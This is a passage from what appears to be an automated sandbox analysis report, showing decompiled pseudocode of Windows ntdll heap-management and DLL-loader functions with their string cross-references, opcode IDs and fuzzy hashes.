                                      								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                      								E0197B150();
                                      								_t257 = _t260 + 4;
                                      								__eflags =  *0x1a67bc8;
                                      								if(__eflags == 0) {
                                      									E01A32073(_t206, 1, _t251, __eflags);
                                      								}
                                      								_t235 = _v24;
                                      							}
                                      						}
                                      					}
                                      				}
                                      				_t134 =  *((intOrPtr*)(_t256 + 6));
                                      				if(_t134 == 0) {
                                      					_t210 = _t206;
                                      					_v48 = _t206;
                                      				} else {
                                      					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                      					_v48 = _t210;
                                      				}
                                      				_v5 =  *(_t256 + 2);
                                      				do {
                                      					if(_t235 > 0xfe00) {
                                      						_v12 = 0xfe00;
                                      						__eflags = _t235 - 0xfe01;
                                      						if(_t235 == 0xfe01) {
                                      							_v12 = 0xfdf0;
                                      						}
                                      						_t138 = 0;
                                      					} else {
                                      						_v12 = _t235 & 0x0000ffff;
                                      						_t138 = _v5;
                                      					}
                                      					 *(_t256 + 2) = _t138;
                                      					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                      					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                      					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                      						_t141 = 0;
                                      					} else {
                                      						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                      						_v40 = _t141;
                                      						if(_t141 >= 0xfe) {
                                      							_push(_t210);
                                      							E01A3A80D(_t236, _t256, _t210, 0);
                                      							_t141 = _v40;
                                      						}
                                      					}
                                      					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                      					 *((char*)(_t256 + 6)) = _t141;
                                      					_t142 = _v12;
                                      					 *_t256 = _t142;
                                      					 *(_t256 + 3) = 0;
                                      					_t211 = _t142 & 0x0000ffff;
                                      					 *((char*)(_t256 + 7)) = 0;
                                      					_v20 = _t211;
                                      					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                      						_t119 = _t256 + 0x10; // -8
                                      						E019CD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                      						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                      						_t211 = _v20;
                                      					}
                                      					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                      					if(_t252 == 0) {
                                      						L56:
                                      						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                      						_t146 = _t206 + 0xc0;
                                      						goto L19;
                                      					} else {
                                      						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                      							L15:
                                      							_t185 = _t211;
                                      							goto L17;
                                      						} else {
                                      							while(1) {
                                      								_t187 =  *_t252;
                                      								if(_t187 == 0) {
                                      									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                      									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                      									goto L17;
                                      								}
                                      								_t252 = _t187;
                                      								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                      									continue;
                                      								}
                                      								goto L15;
                                      							}
                                      							while(1) {
                                      								L17:
                                      								_t212 = E0199AB40(_t206, _t252, 1, _t185, _t211);
                                      								if(_t212 != 0) {
                                      									_t146 = _t206 + 0xc0;
                                      									break;
                                      								}
                                      								_t252 =  *_t252;
                                      								_t211 = _v20;
                                      								_t185 =  *(_t252 + 0x14);
                                      							}
                                      							L19:
                                      							if(_t146 != _t212) {
                                      								_t237 =  *(_t206 + 0x4c);
                                      								_t253 = _v20;
                                      								while(1) {
                                      									__eflags = _t237;
                                      									if(_t237 == 0) {
                                      										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                      									} else {
                                      										_t184 =  *(_t212 - 8);
                                      										_t237 =  *(_t206 + 0x4c);
                                      										__eflags = _t184 & _t237;
                                      										if((_t184 & _t237) != 0) {
                                      											_t184 = _t184 ^  *(_t206 + 0x50);
                                      											__eflags = _t184;
                                      										}
                                      										_t147 = _t184 & 0x0000ffff;
                                      									}
                                      									__eflags = _t253 - (_t147 & 0x0000ffff);
                                      									if(_t253 <= (_t147 & 0x0000ffff)) {
                                      										goto L20;
                                      									}
                                      									_t212 =  *_t212;
                                      									__eflags = _t206 + 0xc0 - _t212;
                                      									if(_t206 + 0xc0 != _t212) {
                                      										continue;
                                      									} else {
                                      										goto L20;
                                      									}
                                      									goto L56;
                                      								}
                                      							}
                                      							L20:
                                      							_t149 =  *((intOrPtr*)(_t212 + 4));
                                      							_t33 = _t256 + 8; // -16
                                      							_t238 = _t33;
                                      							_t254 =  *_t149;
                                      							if( *_t149 != _t212) {
                                      								_push(_t212);
                                      								E01A3A80D(0, _t212, 0, _t254);
                                      							} else {
                                      								 *_t238 = _t212;
                                      								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                      								 *_t149 = _t238;
                                      								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                      							}
                                      							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                      							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                      							if(_t255 == 0) {
                                      								L36:
                                      								if( *(_t206 + 0x4c) != 0) {
                                      									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                      									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                      								}
                                      								_t210 = _v48;
                                      								_t251 = _v12 & 0x0000ffff;
                                      								_t131 = _v20;
                                      								_t235 = _v24 - _t131;
                                      								_v24 = _t235;
                                      								_t256 = _t256 + _t131 * 8;
                                      								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                      									goto L41;
                                      								} else {
                                      									goto L39;
                                      								}
                                      							} else {
                                      								_t216 =  *_t256 & 0x0000ffff;
                                      								_v28 = _t216;
                                      								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                      									L28:
                                      									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                      									_v32 = _t242;
                                      									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                      										_t167 = _t242 + _t242;
                                      									} else {
                                      										_t167 = _t242;
                                      									}
                                      									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                      									_t168 = _t167 << 2;
                                      									_v40 = _t168;
                                      									_t206 = _v44;
                                      									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                      									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                      										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                      									}
                                      									_t217 = _v16;
                                      									if(_t217 != 0) {
                                      										_t173 = _t217 - 8;
                                      										_v52 = _t173;
                                      										_t174 =  *_t173;
                                      										__eflags =  *(_t206 + 0x4c);
                                      										if( *(_t206 + 0x4c) != 0) {
                                      											_t245 =  *(_t206 + 0x50) ^ _t174;
                                      											_v36 = _t245;
                                      											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                      											__eflags = _t245 >> 0x18 - _t225;
                                      											if(_t245 >> 0x18 != _t225) {
                                      												_push(_t225);
                                      												E01A3A80D(_t206, _v52, 0, 0);
                                      											}
                                      											_t174 = _v36;
                                      											_t217 = _v16;
                                      											_t242 = _v32;
                                      										}
                                      										_v28 = _v28 - (_t174 & 0x0000ffff);
                                      										__eflags = _v28;
                                      										if(_v28 > 0) {
                                      											goto L34;
                                      										} else {
                                      											goto L33;
                                      										}
                                      									} else {
                                      										L33:
                                      										_t58 = _t256 + 8; // -16
                                      										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                      										_t206 = _v44;
                                      										_t217 = _v16;
                                      										L34:
                                      										if(_t217 == 0) {
                                      											asm("bts eax, edx");
                                      										}
                                      										goto L36;
                                      									}
                                      								} else {
                                      									goto L24;
                                      								}
                                      								while(1) {
                                      									L24:
                                      									_t182 =  *_t255;
                                      									if(_t182 == 0) {
                                      										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                      										__eflags = _t216;
                                      										goto L28;
                                      									}
                                      									_t255 = _t182;
                                      									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                      										continue;
                                      									} else {
                                      										goto L28;
                                      									}
                                      								}
                                      								goto L28;
                                      							}
                                      						}
                                      					}
                                      					L39:
                                      				} while (_t235 != 0);
                                      				_t214 = _v12;
                                      				_t131 =  *(_t206 + 0x54) ^ _t214;
                                      				 *(_t256 + 4) = _t131;
                                      				if(_t214 == 0) {
                                      					__eflags =  *0x1a68748 - 1;
                                      					if( *0x1a68748 >= 1) {
                                      						_t127 = _t256 + 0xfff; // 0xfff
                                      						_t131 = _t127 & 0xfffff000;
                                      						__eflags = _t131 - _t256;
                                      						if(_t131 != _t256) {
                                      							_t156 =  *[fs:0x30];
                                      							__eflags =  *(_t156 + 0xc);
                                      							if( *(_t156 + 0xc) == 0) {
                                      								_push("HEAP: ");
                                      								E0197B150();
                                      							} else {
                                      								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      							}
                                      							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                      							_t131 = E0197B150();
                                      							__eflags =  *0x1a67bc8;
                                      							if(__eflags == 0) {
                                      								_t131 = E01A32073(_t206, 1, _t251, __eflags);
                                      							}
                                      						}
                                      					}
                                      				}
                                      				goto L41;
                                      			}

                                      Strings
                                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 019E2403
                                      • HEAP: , xrefs: 019E22E6, 019E23F6
                                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019E22F3
                                      • HEAP[%wZ]: , xrefs: 019E22D7, 019E23E7
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                      • API String ID: 0-1657114761
                                      • Opcode ID: a396c46b8cf33e39ddd407c978b94cf28ff8ca78f0cb217ae3a4be10c5ddf19a
                                      • Instruction ID: d24d4b5b16eb3c949a7965414291165162c7eb9b7a21c3df16d8599ef7ed4a67
                                      • Opcode Fuzzy Hash: a396c46b8cf33e39ddd407c978b94cf28ff8ca78f0cb217ae3a4be10c5ddf19a
                                      • Instruction Fuzzy Hash: 16D1BC34A002469FDF19CF6DC490BAABBF6FF88300F158569D99E9B746E334A841CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 69%
                                      			E0199A229(void* __ecx, void* __edx) {
                                      				signed int _v20;
                                      				char _v24;
                                      				char _v28;
                                      				void* _v44;
                                      				void* _v48;
                                      				void* _v56;
                                      				void* _v60;
                                      				void* __ebx;
                                      				signed int _t55;
                                      				signed int _t57;
                                      				void* _t61;
                                      				intOrPtr _t62;
                                      				void* _t65;
                                      				void* _t71;
                                      				signed char* _t74;
                                      				intOrPtr _t75;
                                      				signed char* _t80;
                                      				intOrPtr _t81;
                                      				void* _t82;
                                      				signed char* _t85;
                                      				signed char _t91;
                                      				void* _t103;
                                      				void* _t105;
                                      				void* _t121;
                                      				void* _t129;
                                      				signed int _t131;
                                      				void* _t133;
                                      
                                      				_t105 = __ecx;
                                      				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                      				_t103 = __edx;
                                      				_t129 = __ecx;
                                      				E0199DF24(__edx,  &_v28, _t133);
                                      				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                      				asm("sbb edi, edi");
                                      				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                      				if(_t55 != 0) {
                                      					_push(0);
                                      					_push(0x14);
                                      					_push( &_v24);
                                      					_push(3);
                                      					_push(_t129);
                                      					_push(0xffffffff);
                                      					_t57 = E019B9730();
                                      					__eflags = _t57;
                                      					if(_t57 < 0) {
                                      						L17:
                                      						_push(_t105);
                                      						E01A3A80D(_t129, 1, _v20, 0);
                                      						_t121 = 4;
                                      						goto L1;
                                      					}
                                      					__eflags = _v20 & 0x00000060;
                                      					if((_v20 & 0x00000060) == 0) {
                                      						goto L17;
                                      					}
                                      					__eflags = _v24 - _t129;
                                      					if(_v24 == _t129) {
                                      						goto L1;
                                      					}
                                      					goto L17;
                                      				}
                                      				L1:
                                      				_push(_t121);
                                      				_push(0x1000);
                                      				_push(_t133 + 0x14);
                                      				_push(0);
                                      				_push(_t133 + 0x20);
                                      				_push(0xffffffff);
                                      				_t61 = E019B9660();
                                      				_t122 = _t61;
                                      				if(_t61 < 0) {
                                      					_t62 =  *[fs:0x30];
                                      					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                      					__eflags =  *(_t62 + 0xc);
                                      					if( *(_t62 + 0xc) == 0) {
                                      						_push("HEAP: ");
                                      						E0197B150();
                                      					} else {
                                      						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					_push( *((intOrPtr*)(_t133 + 0xc)));
                                      					_push( *((intOrPtr*)(_t133 + 0x14)));
                                      					_push(_t129);
                                      					E0197B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                      					_t65 = 0;
                                      					L13:
                                      					return _t65;
                                      				}
                                      				_t71 = E01997D50();
                                      				_t124 = 0x7ffe0380;
                                      				if(_t71 != 0) {
                                      					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      				} else {
                                      					_t74 = 0x7ffe0380;
                                      				}
                                      				if( *_t74 != 0) {
                                      					_t75 =  *[fs:0x30];
                                      					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                      					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                      						E01A3138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                      					}
                                      				}
                                      				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                      				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                      				if(E01997D50() != 0) {
                                      					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      				} else {
                                      					_t80 = _t124;
                                      				}
                                      				if( *_t80 != 0) {
                                      					_t81 =  *[fs:0x30];
                                      					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                      					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                      						__eflags = E01997D50();
                                      						if(__eflags != 0) {
                                      							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      						}
                                      						E01A31582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                      					}
                                      				}
                                      				_t82 = E01997D50();
                                      				_t125 = 0x7ffe038a;
                                      				if(_t82 != 0) {
                                      					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                      				} else {
                                      					_t85 = 0x7ffe038a;
                                      				}
                                      				if( *_t85 != 0) {
                                      					__eflags = E01997D50();
                                      					if(__eflags != 0) {
                                      						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                      						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                      					}
                                      					E01A31582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                      				}
                                      				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                      				_t91 =  *(_t103 + 2);
                                      				if((_t91 & 0x00000004) != 0) {
                                      					E019CD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                      					_t91 =  *(_t103 + 2);
                                      				}
                                      				 *(_t103 + 2) = _t91 & 0x00000017;
                                      				_t65 = 1;
                                      				goto L13;
                                      			}

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                      • API String ID: 2994545307-2586055223
                                      • Opcode ID: 5bb61741ac78f2a1c7931aaec704cf50fb95d0b4e7e27a06ecd050bf4c8342e4
                                      • Instruction ID: e8f2457d8153befdb11b3a96649d809b1e8f9546fc56a210b9abc23db5f226ce
                                      • Opcode Fuzzy Hash: 5bb61741ac78f2a1c7931aaec704cf50fb95d0b4e7e27a06ecd050bf4c8342e4
                                      • Instruction Fuzzy Hash: 5F51F5322146819FE722DB6CC848F6B7BE8FF84B50F1908A8F559CB291D775D940CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 44%
                                      			E019A8E00(void* __ecx) {
                                      				signed int _v8;
                                      				char _v12;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr* _t32;
                                      				intOrPtr _t35;
                                      				intOrPtr _t43;
                                      				void* _t46;
                                      				intOrPtr _t47;
                                      				void* _t48;
                                      				signed int _t49;
                                      				void* _t50;
                                      				intOrPtr* _t51;
                                      				signed int _t52;
                                      				void* _t53;
                                      				intOrPtr _t55;
                                      
                                      				_v8 =  *0x1a6d360 ^ _t52;
                                      				_t49 = 0;
                                      				_t48 = __ecx;
                                      				_t55 =  *0x1a68464; // 0x74b10110
                                      				if(_t55 == 0) {
                                      					L9:
                                      					if( !_t49 >= 0) {
                                      						if(( *0x1a65780 & 0x00000003) != 0) {
                                      							E019F5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                      						}
                                      						if(( *0x1a65780 & 0x00000010) != 0) {
                                      							asm("int3");
                                      						}
                                      					}
                                      					return E019BB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                      				}
                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                      				_t43 =  *0x1a67984; // 0x1512b08
                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                      					if(_t48 == _t43) {
                                      						_t50 = 0x5c;
                                      						if( *_t32 == _t50) {
                                      							_t46 = 0x3f;
                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                      								_t32 = _t32 + 8;
                                      							}
                                      						}
                                      					}
                                      					_t51 =  *0x1a68464; // 0x74b10110
                                      					 *0x1a6b1e0(_t47, _t32,  &_v12);
                                      					_t49 =  *_t51();
                                      					if(_t49 >= 0) {
                                      						L8:
                                      						_t35 = _v12;
                                      						if(_t35 != 0) {
                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                      								E019A9B10( *((intOrPtr*)(_t48 + 0x48)));
                                      								_t35 = _v12;
                                      							}
                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                      						}
                                      						goto L9;
                                      					}
                                      					if(_t49 != 0xc000008a) {
                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                      							if(_t49 != 0xc00000bb) {
                                      								goto L8;
                                      							}
                                      						}
                                      					}
                                      					if(( *0x1a65780 & 0x00000005) != 0) {
                                      						_push(_t49);
                                      						E019F5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                      						_t53 = _t53 + 0x1c;
                                      					}
                                      					_t49 = 0;
                                      					goto L8;
                                      				} else {
                                      					goto L9;
                                      				}
                                      			}

                                      Strings
                                      • LdrpFindDllActivationContext, xrefs: 019E9331, 019E935D
                                      • minkernel\ntdll\ldrsnap.c, xrefs: 019E933B, 019E9367
                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 019E9357
                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 019E932A
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                      • API String ID: 0-3779518884
                                      • Opcode ID: 90240b48e826383986b598fa2da6ebaecd413e5be8b014aaf9ce9c0e9a6f002c
                                      • Instruction ID: 9b7d832e2c00311d06369bdf1d4fb87402f3a144486dbcc1950975bb2b6cf112
                                      • Opcode Fuzzy Hash: 90240b48e826383986b598fa2da6ebaecd413e5be8b014aaf9ce9c0e9a6f002c
                                      • Instruction Fuzzy Hash: 40410772A00315DEEF36BB1CC84CA76B7A8AB4025BFA64569EB0C97151E7747D8883C1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                      • API String ID: 2994545307-336120773
                                      • Opcode ID: 18ffac304da2a612834211e7364ee7d9abb8a27e66b842b021450ef57a2c764c
                                      • Instruction ID: 9de6c02db08d98860d26b68efb31aa5f781e7cb1f556aadfc0f7499a89f36174
                                      • Opcode Fuzzy Hash: 18ffac304da2a612834211e7364ee7d9abb8a27e66b842b021450ef57a2c764c
                                      • Instruction Fuzzy Hash: 1F312835A00204EFD721DF5DD885F6BB7E8FF88720F184069F90ADB251E671A881CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E019999BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                      				char _v5;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed short _v20;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed short _t186;
                                      				intOrPtr _t187;
                                      				signed short _t190;
                                      				signed int _t196;
                                      				signed short _t197;
                                      				intOrPtr _t203;
                                      				signed int _t207;
                                      				signed int _t210;
                                      				signed short _t215;
                                      				intOrPtr _t216;
                                      				signed short _t219;
                                      				signed int _t221;
                                      				signed short _t222;
                                      				intOrPtr _t228;
                                      				signed int _t232;
                                      				signed int _t235;
                                      				signed int _t250;
                                      				signed short _t251;
                                      				intOrPtr _t252;
                                      				signed short _t254;
                                      				intOrPtr _t255;
                                      				signed int _t258;
                                      				signed int _t259;
                                      				signed short _t262;
                                      				intOrPtr _t271;
                                      				signed int _t279;
                                      				signed int _t282;
                                      				signed int _t284;
                                      				signed int _t286;
                                      				intOrPtr _t292;
                                      				signed int _t296;
                                      				signed int _t299;
                                      				signed int _t307;
                                      				signed int* _t309;
                                      				signed short* _t311;
                                      				signed short* _t313;
                                      				signed char _t314;
                                      				intOrPtr _t316;
                                      				signed int _t323;
                                      				signed char _t328;
                                      				signed short* _t330;
                                      				signed char _t331;
                                      				intOrPtr _t335;
                                      				signed int _t342;
                                      				signed char _t347;
                                      				signed short* _t348;
                                      				signed short* _t350;
                                      				signed short _t352;
                                      				signed char _t354;
                                      				intOrPtr _t357;
                                      				intOrPtr* _t364;
                                      				signed char _t365;
                                      				intOrPtr _t366;
                                      				signed int _t373;
                                      				signed char _t378;
                                      				signed int* _t381;
                                      				signed int _t382;
                                      				signed short _t384;
                                      				signed int _t386;
                                      				unsigned int _t390;
                                      				signed int _t393;
                                      				signed int* _t394;
                                      				unsigned int _t398;
                                      				signed short _t400;
                                      				signed short _t402;
                                      				signed int _t404;
                                      				signed int _t407;
                                      				unsigned int _t411;
                                      				signed short* _t414;
                                      				signed int _t415;
                                      				signed short* _t419;
                                      				signed int* _t420;
                                      				void* _t421;
                                      
                                      				_t414 = __edx;
                                      				_t307 = __ecx;
                                      				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                      				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                      					_v5 = _a8;
                                      					L3:
                                      					_t381 = _a4;
                                      					goto L4;
                                      				} else {
                                      					__eflags =  *(__ecx + 0x4c);
                                      					if( *(__ecx + 0x4c) != 0) {
                                      						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                      						 *_t419 = _t411;
                                      						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                      						__eflags = _t411 >> 0x18 - _t378;
                                      						if(__eflags != 0) {
                                      							_push(_t378);
                                      							E01A2FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                      						}
                                      					}
                                      					_t250 = _a8;
                                      					_v5 = _t250;
                                      					__eflags = _t250;
                                      					if(_t250 != 0) {
                                      						_t400 = _t414[6];
                                      						_t53 =  &(_t414[4]); // -16
                                      						_t348 = _t53;
                                      						_t251 =  *_t348;
                                      						_v12 = _t251;
                                      						_v16 = _t400;
                                      						_t252 =  *((intOrPtr*)(_t251 + 4));
                                      						__eflags =  *_t400 - _t252;
                                      						if( *_t400 != _t252) {
                                      							L49:
                                      							_push(_t348);
                                      							_push( *_t400);
                                      							E01A3A80D(_t307, 0xd, _t348, _t252);
                                      							L50:
                                      							_v5 = 0;
                                      							goto L11;
                                      						}
                                      						__eflags =  *_t400 - _t348;
                                      						if( *_t400 != _t348) {
                                      							goto L49;
                                      						}
                                      						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                      						_t407 =  *(_t307 + 0xb4);
                                      						__eflags = _t407;
                                      						if(_t407 == 0) {
                                      							L36:
                                      							_t364 = _v16;
                                      							_t282 = _v12;
                                      							 *_t364 = _t282;
                                      							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                      							__eflags = _t414[1] & 0x00000008;
                                      							if((_t414[1] & 0x00000008) == 0) {
                                      								L39:
                                      								_t365 = _t414[1];
                                      								__eflags = _t365 & 0x00000004;
                                      								if((_t365 & 0x00000004) != 0) {
                                      									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                      									_v12 = _t284;
                                      									__eflags = _t365 & 0x00000002;
                                      									if((_t365 & 0x00000002) != 0) {
                                      										__eflags = _t284 - 4;
                                      										if(_t284 > 4) {
                                      											_t284 = _t284 - 4;
                                      											__eflags = _t284;
                                      											_v12 = _t284;
                                      										}
                                      									}
                                      									_t78 =  &(_t414[8]); // -8
                                      									_t286 = E019CD540(_t78, _t284, 0xfeeefeee);
                                      									_v16 = _t286;
                                      									__eflags = _t286 - _v12;
                                      									if(_t286 != _v12) {
                                      										_t366 =  *[fs:0x30];
                                      										__eflags =  *(_t366 + 0xc);
                                      										if( *(_t366 + 0xc) == 0) {
                                      											_push("HEAP: ");
                                      											E0197B150();
                                      										} else {
                                      											E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      										}
                                      										_push(_v16 + 0x10 + _t414);
                                      										E0197B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                      										_t292 =  *[fs:0x30];
                                      										_t421 = _t421 + 0xc;
                                      										__eflags =  *((char*)(_t292 + 2));
                                      										if( *((char*)(_t292 + 2)) != 0) {
                                      											 *0x1a66378 = 1;
                                      											asm("int3");
                                      											 *0x1a66378 = 0;
                                      										}
                                      									}
                                      								}
                                      								goto L50;
                                      							}
                                      							_t296 = E0199A229(_t307, _t414);
                                      							__eflags = _t296;
                                      							if(_t296 != 0) {
                                      								goto L39;
                                      							} else {
                                      								E0199A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                      								goto L50;
                                      							}
                                      						} else {
                                      							_t373 =  *_t414 & 0x0000ffff;
                                      							while(1) {
                                      								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
